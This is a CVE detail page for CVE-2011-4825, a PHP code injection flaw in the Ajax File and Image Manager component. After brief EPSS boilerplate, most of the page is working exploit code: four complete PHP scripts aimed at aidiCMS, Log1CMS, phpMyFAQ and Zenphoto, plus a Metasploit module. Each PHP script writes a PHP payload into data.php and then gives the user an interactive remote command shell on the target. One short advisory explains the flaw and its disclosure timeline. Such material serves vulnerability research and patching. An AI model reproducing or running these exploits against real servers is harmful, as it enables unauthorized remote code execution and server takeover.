CVE-2011-4825 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<?php /* -------------------------------------------------------------------- aidiCMS v3.55 (ajax_create_folder.php) Remote Code Execution Exploit -------------------------------------------------------------------- author............: Egidio Romano aka EgiX mail..............: n0b0d13s[at]gmail[dot]com software link.....: http://code.google.com/p/aidicms/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability overview: aidiCMS v3.55 is affected by the vulnerability that I reported to http://www.exploit-db.com/exploits/18075/ [-] Disclosure timeline: [23/10/2011] - Vulnerability discovered [24/10/2011] - Issue reported to http://code.google.com/p/aidicms/issues/detail?id=3 [26/10/2011] - Project members contacted via e-mail [04/11/2011] - Still no response received [05/11/2011] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "\n+-----------------------------------------------------+"; print "\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |"; print "\n+-----------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /aidicms/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\naidicms-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>

-------------------------------------------------------------------------- Ajax File and Image Manager v1.0 Final Remote Code Execution Vulnerability -------------------------------------------------------------------------- author...........: Egidio Romano aka EgiX mail.............: n0b0d13s[at]gmail[dot]com software link....: http://www.phpletter.com/ [-] Vulnerability explanation: The vulnerable code is located into /ajaxfilemanager/ajax_create_folder.php: 11. @ob_start(); 12. displayArray($_POST); 13. writeInfo(@ob_get_clean()); this script start the output buffering at line 11 and then call the 'displayArray' function that simply displays the $_POST array content with the print_r() function, and finally at line 13 is called the 'writeInfo' function using the current buffer contents as parameter (that is the $_POST array content). Now look at the 'writeInfo' function body defined into /ajaxfilemanager/inc/function.base.php: 228. function writeInfo($data, $die = false) 229. { 230. $fp = @fopen(dirname(__FILE__) . DIRECTORY_SEPARATOR . 'data.php', 'w+'); 231. @fwrite($fp, $data); 232. @fwrite($fp, "\n\n" . date('d/M/Y H:i:s') ); 233. @fclose($fp); It writes the $data paramater into a file called 'data.php' without any check, so an attacker could be able to inject and execute arbitrary PHP code. [-] Disclosure timeline: [21/10/2011] - Vulnerability discovered [24/10/2011] - Issue reported via e-mail [25/10/2011] - Vendor replied that a fix will be released in the next version [04/11/2011] - Public disclosure

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Log1 CMS writeInfo() PHP Code Injection", 'Description' => %q{ This module exploits the "Ajax File and Image Manager" component that can be found in log1 CMS. In function.base.php of this component, the 'data' parameter in writeInfo() allows any malicious user to have direct control of writing data to file data.php, which results in arbitrary remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'EgiX', #Found the bug in ajax_create_folder.php 'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2011-4825'], ['OSVDB', '76928'], ['EDB', '18075'], #Egix's advisory ['EDB', '18151'] #Adel's ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['log1 CMS 2.0', {}], ], 'Privileged' => false, 'DisclosureDate' => "Apr 11 2011", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to log1 CMS', '/log1cms2.0/']) ], self.class) end def check uri = target_uri.path uri << '/' if uri[-1, 1] != '/' res = send_request_raw({ 'method' => 'GET', 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php" }) if res and res.code == 200 return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path uri << '/' if uri[-1, 1] != '/' peer = "#{rhost}:#{rport}" php = %Q|#{rand_text_alpha(10)}=<?php #{payload.encoded} ?>| print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php", 'data' => php }) print_status("#{peer} - Requesting data.php") send_request_raw({ 'method' => 'GET', 'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php" }) handler end end

<?php /* +-----------------------------------------------------------+ + Log1CMS 2.0(ajax_create_folder.php) Remote Code Execution + +-----------------------------------------------------------+ Web-App : Log1CMS 2.0 Vendor : http://log1cms.sourceforge.net/ Vulnerability : Remote Code Execution Author : Adel SBM Website : www.The-code.tk Facebook : http://www.facebook.com/profile.php?id=100002938082057 Google-Dork : "POWERED BY LOG1 CMS" Tested on : Windows XP SP2 +-----------------------------------------------------------+ + VIVE Algeria + +-----------------------------------------------------------+ */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No Response From {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "\n+------------------------------------------------------------------------+"; print "\n| Log1CMS 2.0 Remote Code Execution Exploit by Adel SBM |"; print "\n| SPl ThanX To: EgiX(exploit founder end coder)-The DoN |"; print "\n| Greetz to: Over-X & ind0ushka .. |"; print "\n| TeaM Official website: www.The-code.tk |"; print "\n| VIVE Algeria |"; print "\n+------------------------------------------------------------------------+\n"; if ($argc < 3) { print "\n+------------------------------------------------------------------------+"; print "\n| Usage......: php $argv[0] <host> <path> |"; print "\n| Example....: php $argv[0] localhost / |"; print "\n| Example....: php $argv[0] localhost /log1cms/ |"; print "\n+------------------------------------------------------------------------+\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}admin/libraries/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\n@AdelSBM# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>

<?php /* ------------------------------------------------------------------------ phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution Exploit ------------------------------------------------------------------------ author............: Egidio Romano aka EgiX mail..............: n0b0d13s[at]gmail[dot]com software link.....: http://www.phpmyfaq.de/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability overview: All versions of phpMyFAQ <= 2.6.18 and phpMyFAQ <= 2.7.0 are affected by the vulnerability that I reported to http://www.exploit-db.com/exploits/18075/ Successful exploitation of this vulnerability requires authentication. [-] Disclosure timeline: [23/10/2011] - Vulnerability discovered [24/10/2011] - Issue reported to http://forum.phpmyfaq.de/viewtopic.php?t=13402 [25/10/2011] - Fix released, more details at http://www.phpmyfaq.de/advisory_2011-10-25.php [05/11/2011] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------------------------+"; print "\n| phpMyFAQ <= 2.7.0 Remote Code Execution Exploit by EgiX |"; print "\n+---------------------------------------------------------+\n"; if ($argc < 5) { print "\nUsage......: php $argv[0] <host> <path> <username> <password>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /phpmyfaq/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "faqusername={$argv[3]}&faqpassword={$argv[4]}"; $packet = "POST {$path}?action=login HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pmf_auth=foo\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; if (!preg_match("/pmf_auth=([^;]*);/", http_send($host, $packet), $auth)) die("\n[-] Login failed!\n"); $packet = "GET {$path}admin/editor/plugins/ajaxfilemanager/ajax_login.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pmf_auth={$auth[1]}\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); $payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}admin/editor/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: pmf_auth={$auth[1]}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}admin/editor/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nphpmyfaq-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>

<?php /* -------------------------------------------------------------------------- Zenphoto <= 1.4.1.4 (ajax_create_folder.php) Remote Code Execution Exploit -------------------------------------------------------------------------- author............: Egidio Romano aka EgiX mail..............: n0b0d13s[at]gmail[dot]com software link.....: http://www.zenphoto.org/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability overview: All versions of Zenphoto from 1.2.4 to 1.4.1.4 are affected by the vulnerability that I reported to http://www.exploit-db.com/exploits/18075/ [-] Disclosure timeline: [21/10/2011] - Vulnerability discovered [24/10/2011] - Issue reported to http://www.zenphoto.org/trac/ticket/2005 [31/10/2011] - Fix released with version 1.4.1.5 [05/11/2011] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die( "\n[-] No response from {$host}:80\n"); fwrite($sock, $packet); return stream_get_contents($sock); } print "\n+-----------------------------------------------------------+"; print "\n| Zenphoto <= 1.4.1.4 Remote Code Execution Exploit by EgiX |"; print "\n+-----------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /zenphoto/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $packet = "POST {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nzenphoto-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>